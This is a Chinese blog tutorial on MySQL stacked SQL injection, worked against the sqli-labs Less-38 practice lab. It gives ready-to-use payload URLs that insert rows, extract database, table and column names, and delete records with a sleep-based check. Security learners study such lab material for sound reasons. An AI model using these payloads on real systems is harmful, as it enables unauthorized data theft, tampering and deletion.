Mysql注入 -- 堆叠注入

最新推荐文章于 2024-02-23 02:56:35 发布
最新推荐文章于 2024-02-23 02:56:35 发布
阅读量1.2k 收藏 16
点赞数 4
分类专栏: MySQL注入 文章标签: mysql注入 堆叠注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/117247510
版权

你上学时没读过的书、没上过的课、没跑过的步,总有一天会让你全部还回来。。。

----  网易云热评

 

一、堆叠注入介绍

1、多条sql语句同时执行

2、union只能执行查询语句,堆叠可以执行增删改查

3、同时执行三条语句

select 1;select 2;select 3;

二、插入注入

1、找到注入点,添加一条数据

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(66,'aiyou','bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=66

2、获取数据库名称

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(67,database(),'bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=67获取数据库名称

3、获取数据库中的表名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(71,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1) ,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=71获取表名信息

4、获取表中的字段名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(74,(select column_name from information_schema.columns where table_name="users" limit 13,1) ,(select column_name from information_schema.columns where table_name="users" limit 12,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=74获取字段信息

三、删除删除注入

http://192.168.139.129/sqli/Less-38/?id=1';delete from users where id=74 and sleep(if((select database())=0x7365637572697479,5,0));

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

web安全工具库
关注
  • 4
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
26-2 SQL注入攻击 - 堆叠注入(Stacked Injection)
weixin_43263566的博客
03-10 476
堆叠注入(Stacked Injection)是指一次性执行多条 SQL 语句的注入技术。在实际应用中,堆叠注入通常指在MySQL等数据库中,通过在命令行中以分号(;)分隔每条语句来实现同时执行多条语句的注入攻击。因此,堆叠注入即为一堆(多条)SQL语句一起执行的注入攻击方式。
sql注入过滤select_SQL注入高级进阶-堆叠注入
weixin_39808803的博客
11-21 1340
原理0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。0x01 堆叠注入原理 在SQL中,分号(;)是用来表示一条s...
SQL Injection8(堆叠注入)——强网杯2019随便注
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠注入)——强网杯2019随便注 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便注是一道sql注入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠注入的知识,堆叠注入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠注入原理 在SQL中,...
MySQL堆叠注入
qq_39654116的博客
01-05 536
目录堆叠注入简介对照表格语句 堆叠注入 简介 堆叠注入mysql上不常见,必须要用到[[mysqli_multi_query()]],可以用分号分割来执行多个语句,堆叠注入非常危险,通常sql注入有诸多限制,比如只能查不能增删改,不能更改数据库设置,而堆叠注入相当于获取了数据库密码进行直连,直接操作数据库 对照表格 PHP连接MySQL数据库有三种方式(MySQLMysqli、PDO),同时官方对三者也做了列表性比较: Mysqli PDO MySQL 引入的PHP版本 5.0 5.0
MYSQL 堆叠注入详解
AaronLuo
09-19 4485
堆叠注入与受限于select语句的联合查询法相反,堆叠注入可用于执行任意SQL语句。简单地说就是MYSQL的多语句查询 堆叠注入的局限性:堆叠注入并不是在哦任何换环境下都可以执行的,可能受到API或者数据库引擎不支持的限制(如Oracle数据库),也有可能权限不足。web系统中,因为代码通常只返回一个查询结果,因此堆叠注入第二个语句产生错误或者结果只能被忽略,我们在前端界面是无法看到返回结果的。因...
MySQL堆叠注入
yuan_boss的博客
08-23 1349
可以看到有个表名为users,可以很容易猜测到这是存用户信息的表,所以可以通过sql注入查找这个表的字段名。通过以上操作,可以知道存密码的地方在users表中,而且密码字段名字为password。再次正常访问,即可发现密码已经修改成了654321。注意堆叠注入需要使用分号表示一个sql语句的结束。任务:对38关进行修改密码,删库,恢复环境。38关,堆叠查询,修改密码为654321。通过堆叠注入即可完成修改密码的操作。
mysql堆叠注入条件,SQL注入 堆叠注入(Stack Injection)
weixin_28930803的博客
03-23 372
注入原理平常我们注入时都是通过对原来sql语句传输数据的地方进行相关修改,注入情况会因为该语句本身的情况而受到相关限制,例如一个select语句,那么我们注入时也只能执行select操作,无法进行增、删、改,其他语句也同理,所以可以说我们能够注入的十分有限。但堆叠注入则完全打破了这种限制,其名字顾名思义,就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简...
mysql注入-sqlilabs靶场注入
10-15
MySQL注入是一种常见的网络安全漏洞,主要发生在应用程序中,当用户输入的数据未经充分验证或过滤就直接用于构造SQL查询时。SQL注入攻击者可以利用这个漏洞执行恶意的SQL命令,获取、修改、删除数据库中的敏感信息,...
mysql-injection.pdf
03-31
5. 第三部分的“Stackedinjection”可能指向堆叠注入技术,这种技术可以让攻击者在一个查询中执行多个SQL语句。 6. 第四部分的“Challenges”可能包含一系列更为复杂的SQL注入练习,这将帮助用户提升自己的技能。 ...
渗透测试:堆叠注入--MCIR的challenge6.php实例
WEL测试
11-18 467
说明 MCIR提供/sqlol/challenges/challenge6.php实例是不完毕的,需要调整mcir/includes/database.inc.php使用的adodb的Execute进行sql执行,不支持堆叠sql执行方法mysqli_multi_query。因此本实例执行是失败的,关于堆叠注入失败验证过程如下: 操作步骤 页面:/sqlol/challenges/challenge6.php 输入' and '1=2' 获取执行的sql如下: '; CREATE TABLE sqlol
MYSQL注入天书之stacked injection
weixin_34221332的博客
08-11 642
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
mysql堆叠注入条件_堆叠注入详解
weixin_39943383的博客
02-10 1028
0x00 堆叠注入定义Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在 mysql 中, 主要是命令行中,每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。0x01 堆叠注入原理在SQL中,分号(;)是用来表示一条sql语句的结束。...
buu web:随便注(MySQL堆叠注入
m0_55378150的博客
04-01 1187
打开靶场,发现是一个查询框 输入1' ,报错,说明存在sql注入漏洞
sql注入堆叠注入
最新发布
m0_68976043的博客
02-23 2065
堆叠注入产生原因是因为mysql_multi_query()支持多行查询,如果没有这个函数我们使用不了堆叠注入,其次堆叠注入通过分号分隔。
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3234
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
SQL注入-堆叠注入
jokerhappy的博客
07-26 518
堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 堆叠注入原理: 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而un
SQL注入篇——堆叠注入
爱国小白帽
02-10 988
堆叠注入能同时执行多条语句 注入语句: id=1;CREATE DATABASE sq default charset utf8; -- - 查询id为1的用户名密码,同时创建名为sq的数据库。 数据库创建成功,说明两条语句都执行了。 ...
MySQL堆叠查询
u014650965的博客
06-20 286
堆叠查询攻击及预防办法
mysql堆叠注入条件_白帽子:SQL注入堆叠注入
weixin_31358991的博客
02-10 307
原标题:白帽子:SQL注入堆叠注入在SQL语句中,语句的结束都是以`;`结尾,但是如果我们在`;`后面再加上一条SQL语句,两条语句会一起执行吗?这也就是造成堆叠注入的原因了最简单的语句`select * from users;DELETE FROM test`先查询user表,然后再从test数据库里删除user表。下面我们进行实战靶场:sql-libs38先判断闭合点,为' 再构造paylo...
SQL注入实战:MySQL注入天书-Sqli-labs详解
最后一部分是关于堆叠注入的探讨,背景8解释了堆叠注入的概念,Less-38和Less-39提供了实践堆叠注入的实例,帮助读者理解如何在多条SQL语句中注入代码,以达到攻击目的。 通过"Sqli-labs"这个平台,学习者可以逐步...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值